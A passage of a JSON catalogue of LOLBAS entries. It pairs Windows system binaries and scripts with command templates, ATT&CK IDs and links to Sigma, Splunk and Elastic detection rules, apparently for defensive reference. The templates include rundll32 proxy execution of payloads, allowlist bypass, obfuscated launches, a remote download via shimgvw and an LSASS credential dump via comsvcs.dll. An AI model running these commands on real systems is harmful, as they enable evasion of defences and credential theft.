specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml"}],"references":["https://github.com/huntresslabs/evading-autoruns","https://twitter.com/pabraeken/status/994742106852941825","https://windows10dll.nirsoft.net/setupapi_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:setupapi-dll:1","toolId":"lolbas:setupapi-dll","toolName":"Setupapi.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Launch an executable file via the InstallHinfSection function and .inf file section directive.","usecase":"Load an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml"}],"references":["https://github.com/huntresslabs/evading-autoruns","https://twitter.com/pabraeken/status/994742106852941825","https://windows10dll.nirsoft.net/setupapi_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:shdocvw-dll:0","toolId":"lolbas:shdocvw-dll","toolName":"Shdocvw.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a URL (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shdocvw.dll","c:\\windows\\syswow64\\shdocvw.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/","https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/bohops/status/997690405092290561","https://windows10dll.nirsoft.net/shdocvw_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:shell32-dll:0","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll}","description":"Launch a DLL payload by calling the Control_RunDLL function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:shell32-dll:1","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe}","description":"Launch an executable by calling the ShellExec_RunDLL function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:shell32-dll:2","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args}","description":"Launch command line by calling the ShellExec_RunDLL function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:shell32-dll:3","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,#44 {PATH:.dll}","description":"Load a DLL/CPL by calling undocumented Control_RunDLLNoFallback function.","usecase":"Load a DLL/CPL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:shimgvw-dll:0","toolId":"lolbas:shimgvw-dll","toolName":"Shimgvw.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe c:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}","description":"Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.","usecase":"Download file from remote location.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\shimgvw.dll","c:\\windows\\syswow64\\shimgvw.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"IOC","value":"Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line"}],"references":["https://twitter.com/eral4m/status/1479080793003671557","https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:syssetup-dll:0","toolId":"lolbas:syssetup-dll","toolName":"Syssetup.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification (Note May pop an error window).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml"}],"references":["https://twitter.com/pabraeken/status/994392481927258113","https://twitter.com/harr0ey/status/975350238184697857","https://twitter.com/bohops/status/975549525938135040","https://windows10dll.nirsoft.net/syssetup_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:syssetup-dll:1","toolId":"lolbas:syssetup-dll","toolName":"Syssetup.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.","usecase":"Load an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml"}],"references":["https://twitter.com/pabraeken/status/994392481927258113","https://twitter.com/harr0ey/status/975350238184697857","https://twitter.com/bohops/status/975549525938135040","https://windows10dll.nirsoft.net/syssetup_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:url-dll:0","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}","description":"Launch a HTML application payload by calling OpenURL.","usecase":"Invoke an HTML Application via mshta.exe (Default Handler).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:url-dll:1","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a .url (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:url-dll:2","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable by calling OpenURL.","usecase":"Load an executable payload by specifying the file protocol handler (obfuscated).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:url-dll:3","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe}","description":"Launch an executable by calling FileProtocolHandler.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:url-dll:4","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable by calling FileProtocolHandler.","usecase":"Load an executable payload by specifying the file protocol handler (obfuscated).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:url-dll:5","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta","description":"Launch a HTML application payload by calling FileProtocolHandler.","usecase":"Invoke an HTML Application via mshta.exe (Default Handler).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:zipfldr-dll:0","toolId":"lolbas:zipfldr-dll","toolName":"Zipfldr.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe}","description":"Launch an executable payload by calling RouteTheCall.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/moriarty_meng/status/977848311603380224","https://twitter.com/bohops/status/997896811904929792","https://windows10dll.nirsoft.net/zipfldr_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:zipfldr-dll:1","toolId":"lolbas:zipfldr-dll","toolName":"Zipfldr.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable payload by calling RouteTheCall (obfuscated).","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/moriarty_meng/status/977848311603380224","https://twitter.com/bohops/status/997896811904929792","https://windows10dll.nirsoft.net/zipfldr_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:comsvcs-dll:0","toolId":"lolbas:comsvcs-dll","toolName":"Comsvcs.dll","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump {LSASS_PID} dump.bin full","description":"Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.","usecase":"Dump Lsass.exe process memory to retrieve credentials.","mitre":["T1003.001"],"privilege":"system","fullPath":["c:\\windows\\system32\\comsvcs.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml"}],"references":["https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/","https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cl-loadassembly-ps1:0","toolId":"lolbas:cl-loadassembly-ps1","toolName":"CL_LoadAssembly.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell.exe -ep bypass -command \"set-location -path C:\\Windows\\diagnostics\\system\\Audio; import-module .\\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\\..\\..\\..\\testing\\fun.dll;[Program]::Fun()\"","description":"Proxy execute Managed DLL with PowerShell","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml"}],"references":["https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/","https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cl-mutexverifiers-ps1:0","toolId":"lolbas:cl-mutexverifiers-ps1","toolName":"CL_Mutexverifiers.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \\nrunAfterCancelProcess {PATH:.ps1}","description":"Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml"}],"references":["https://twitter.com/pabraeken/status/995111125447577600","https://lolbas-project.github.io/lolbas/Scripts/CL_Mutexverifiers/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cl-invocation-ps1:0","toolId":"lolbas:cl-invocation-ps1","toolName":"CL_Invocation.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":". C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \\nSyncInvoke {CMD}","description":"Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml"}],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Invocation/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:launch-vsdevshell-ps1:0","toolId":"lolbas:launch-vsdevshell-ps1","toolName":"Launch-VsDevShell.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell -ep RemoteSigned -f .\\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe}","description":"Execute binaries from the context of the signed script using the \"VsWherePath\" flag.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml"}],"references":["https://twitter.com/nas_bench/status/1535981653239255040","https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 